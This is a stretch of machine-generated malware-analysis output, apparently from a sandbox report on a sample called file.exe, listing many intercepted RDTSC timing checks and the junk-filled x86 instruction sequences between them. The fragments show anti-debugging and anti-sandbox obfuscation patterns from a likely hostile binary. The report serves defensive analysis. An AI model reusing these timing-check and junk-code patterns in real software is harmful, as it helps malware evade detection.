                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FDB30 second address: 8FDB40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F228D5156C6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FDB40 second address: 8FDB44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FDB44 second address: 8FDBD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 xor cl, 00000063h 0x0000000b cmc 0x0000000c push 00000000h 0x0000000e mov dword ptr [ebp+122D27BEh], ebx 0x00000014 push 891EC4A6h 0x00000019 jnp 00007F228D5156D8h 0x0000001f add dword ptr [esp], 76E13BDAh 0x00000026 or ecx, 7776FB15h 0x0000002c push 00000003h 0x0000002e jbe 00007F228D5156C9h 0x00000034 movsx edi, cx 0x00000037 push 00000000h 0x00000039 xor dword ptr [ebp+122D18EEh], eax 0x0000003f mov di, si 0x00000042 push 00000003h 0x00000044 and edx, dword ptr [ebp+122D2B70h] 0x0000004a call 00007F228D5156C9h 0x0000004f jmp 00007F228D5156CDh 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 pushad 0x00000058 popad 0x00000059 pop eax 0x0000005a pop edx 0x0000005b mov eax, dword ptr [esp+04h] 0x0000005f pushad 0x00000060 jmp 00007F228D5156CBh 0x00000065 push eax 0x00000066 push edx 0x00000067 pop edx 0x00000068 pop eax 0x00000069 popad 0x0000006a mov eax, dword ptr [eax] 0x0000006c pushad 0x0000006d push eax 0x0000006e push edx 0x0000006f push eax 0x00000070 push edx 0x00000071 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FDBD9 second address: 8FDBDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FDBDD second address: 8FDBFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F228D5156D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FDBFD second address: 8FDC43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push edi 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 push edx 0x00000011 pop edx 0x00000012 popad 0x00000013 pop edi 0x00000014 pop eax 0x00000015 and cx, FB72h 0x0000001a lea ebx, dword ptr [ebp+1244FA24h] 0x00000020 jmp 00007F228CBCA0AEh 0x00000025 xchg eax, ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F228CBCA0B5h 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FDC43 second address: 8FDC60 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F228D5156C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c pushad 0x0000000d jmp 00007F228D5156CCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91F33C second address: 91F342 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EB56A second address: 8EB570 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EB570 second address: 8EB582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F228CBCA0A8h 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D127 second address: 91D142 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F228D5156D7h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D2F0 second address: 91D2F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D622 second address: 91D626 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D626 second address: 91D63B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a popad 0x0000000b jl 00007F228CBCA0CAh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D63B second address: 91D656 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F228D5156D2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91DC2D second address: 91DC31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91DC31 second address: 91DC37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91DEDB second address: 91DEE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91DEE0 second address: 91DEE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91DEE6 second address: 91DEEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91E051 second address: 91E05B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91E05B second address: 91E06F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F228CBCA0B0h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91E333 second address: 91E33F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F228D5156C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F3CE7 second address: 8F3D09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F228CBCA0B9h 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91E47E second address: 91E482 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91E482 second address: 91E4A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F228CBCA0B7h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91EA2F second address: 91EA33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91EA33 second address: 91EA39 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91EA39 second address: 91EA49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F228D5156C6h 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91EA49 second address: 91EA6B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F228CBCA0A6h 0x00000008 jng 00007F228CBCA0A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F228CBCA0B0h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91EA6B second address: 91EA6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91EA6F second address: 91EA7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91EA7B second address: 91EA7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91EBF6 second address: 91EC00 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F228CBCA0AEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91EC00 second address: 91EC0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91EC0D second address: 91EC2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F228CBCA0B5h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91EC2B second address: 91EC35 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F228D5156C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91EED9 second address: 91EEDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91EEDD second address: 91EEE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9211D3 second address: 9211D9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9211D9 second address: 9211FE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F228D5156D8h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9211FE second address: 921208 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F228CBCA0A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92079E second address: 9207C9 instructions: 0x00000000 rdtsc 0x00000002 js 00007F228D5156D8h 0x00000008 jmp 00007F228D5156D2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jbe 00007F228D5156D4h 0x00000016 push eax 0x00000017 push edx 0x00000018 jns 00007F228D5156C6h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 921973 second address: 92197D instructions: 0x00000000 rdtsc 0x00000002 js 00007F228CBCA0A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92197D second address: 9219B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F228D5156D8h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f pushad 0x00000010 push esi 0x00000011 jnc 00007F228D5156C6h 0x00000017 pop esi 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b pop edx 0x0000001c popad 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9219B6 second address: 9219BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9219BC second address: 9219C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92395B second address: 923961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 924E34 second address: 924E38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 924E38 second address: 924E44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 924E44 second address: 924E48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E8115 second address: 8E812B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F228CBCA0B2h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E812B second address: 8E814E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F228D5156D9h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E814E second address: 8E8152 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92B60E second address: 92B612 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92B76A second address: 92B770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92B770 second address: 92B77D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92B77D second address: 92B796 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F228CBCA0AFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92B796 second address: 92B7A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F228D5156C6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92BAA6 second address: 92BAAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92DC87 second address: 92DC8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92DC8C second address: 92DC96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F228CBCA0A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92DFC1 second address: 92DFC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92DFC5 second address: 92DFC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92DFC9 second address: 92DFCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E355 second address: 92E35A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E422 second address: 92E428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E8BB second address: 92E8BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92EDF5 second address: 92EDF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92EDF9 second address: 92EE0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jnl 00007F228CBCA0A8h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92FCE8 second address: 92FCEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 931082 second address: 931088 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 931088 second address: 9310A2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F228D5156CFh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9310A2 second address: 9310AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F228CBCA0A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 931957 second address: 93195D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93329C second address: 9332A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 933CB6 second address: 933D11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b popad 0x0000000c nop 0x0000000d mov esi, dword ptr [ebp+122D2A9Ch] 0x00000013 push 00000000h 0x00000015 pushad 0x00000016 push ebx 0x00000017 mov bl, 2Ch 0x00000019 pop ebx 0x0000001a jmp 00007F228D5156CBh 0x0000001f popad 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push eax 0x00000025 call 00007F228D5156C8h 0x0000002a pop eax 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f add dword ptr [esp+04h], 0000001Dh 0x00000037 inc eax 0x00000038 push eax 0x00000039 ret 0x0000003a pop eax 0x0000003b ret 0x0000003c push esi 0x0000003d mov esi, 094C20B3h 0x00000042 pop esi 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 push edx 0x00000047 pushad 0x00000048 popad 0x00000049 pop edx 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 936D4E second address: 936D52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 936D52 second address: 936D5C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F228D5156C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 936D5C second address: 936D62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 936D62 second address: 936D68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 936D68 second address: 936D6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 939EAD second address: 939EB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 939EB1 second address: 939EB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 939EB7 second address: 939EDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F228D5156D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F228D5156C8h 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 939EDA second address: 939EE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93AE01 second address: 93AE05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 938FB8 second address: 938FBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93B001 second address: 93B010 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F228D5156CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93B010 second address: 93B01A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F228CBCA0ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93B01A second address: 93B03D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F228D5156D9h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93B03D second address: 93B04B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F228CBCA0A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93B04B second address: 93B04F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93D089 second address: 93D08F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93D08F second address: 93D093 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93C0E3 second address: 93C0E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F0F1 second address: 93F0F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E353 second address: 93E358 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
